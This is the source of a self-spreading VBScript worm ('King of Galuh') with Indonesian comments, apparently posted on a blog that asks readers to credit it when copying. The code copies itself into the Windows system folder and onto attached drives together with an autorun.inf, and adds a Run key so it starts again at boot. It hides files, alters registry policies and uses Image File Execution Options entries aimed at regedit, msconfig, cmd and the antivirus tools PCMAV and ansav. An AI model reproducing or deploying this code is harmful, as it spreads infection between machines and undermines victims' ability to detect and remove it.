dim urang,abdi,aing,kuring,anak,mf,isi,tf,galuh,nt,check,sd
'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe galuh.3gp.vbs"
set anak = createobject("Scripting.FileSystemObject")
set mf = anak.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
urang = urang & text.readline
urang = urang & vbcrlf
loop
do
'buat file induk
Set aing = anak.getspecialfolder(0)
Set abdi = anak.getspecialfolder(1)
set tf = anak.getfile(abdi & "\recycle.vbs")
tf.attributes = 32
set tf = anak.createtextfile(abdi & "\recycle.vbs",2,true)
tf.write urang
tf.close
set tf = anak.getfile(abdi & "\recycle.vbs")
tf.attributes = 39
'sebar ke removable disc ditambahkan dengan Autorun.inf
for each kuring in anak.drives
If (kuring.drivetype = 1 or kuring.drivetype = 2) and kuring.path <> "A:" then
set tf=anak.getfile(kuring.path &"\galuh.sys.vbs")
tf.attributes =32
set tf=anak.createtextfile(kuring.path &"\galuh.3gp.vbs",2,true)
tf.write urang
tf.close
set tf=anak.getfile(kuring.path &"\galuh.3gp.vbs")
tf.attributes = 39
set tf =anak.getfile(kuring.path &"\autorun.inf")
tf.attributes = 32
set tf=anak.createtextfile(kuring.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = anak.getfile(kuring.path &"\autorun.inf")
tf.attributes=39
end if
next
'Manipulasi Registry
set galuh = createobject("WScript.Shell")
'Ubah IE Title
galuh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: Dunia ini sudah enggan untuk bersahabat Tolong sadar mari kita jaga alam ini terutamna air, udara, tanah, n hutan ::"
'File Hidden tak terlihat
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",0, "REG_DWORD"
'Blokir Find, FolderOptions, Run, Regedit, Task Manager, System Restore, perubahan Wallpaper, Hotkey, Control Panel, dan Log Off
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "0", "REG_DWORD"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "0", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "0", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "0", "REG_DWORD"
galuh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "0", "REG_DWORD"
'Ubah tulisan pertama pada text box menu RUN
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "King Of Galuh"
galuh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"
'Buat pesan saat Windows Startup
galuh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "King of Galuh"
galuh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "sory coy gue numpang istirahat di komputer kamu tenang aja komputer kamu masih aman-aman aja coz aku ga delete file kamu kok....!!!!! hhe......hee...... by: xipemainopth"
galuh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", abdi & "\recycle.vbs"
galuh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.google.com"
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
galuh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run aing & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Bagi yang ingin copy paste jangan lupa di sertai back link ke situs ini dan sumber.
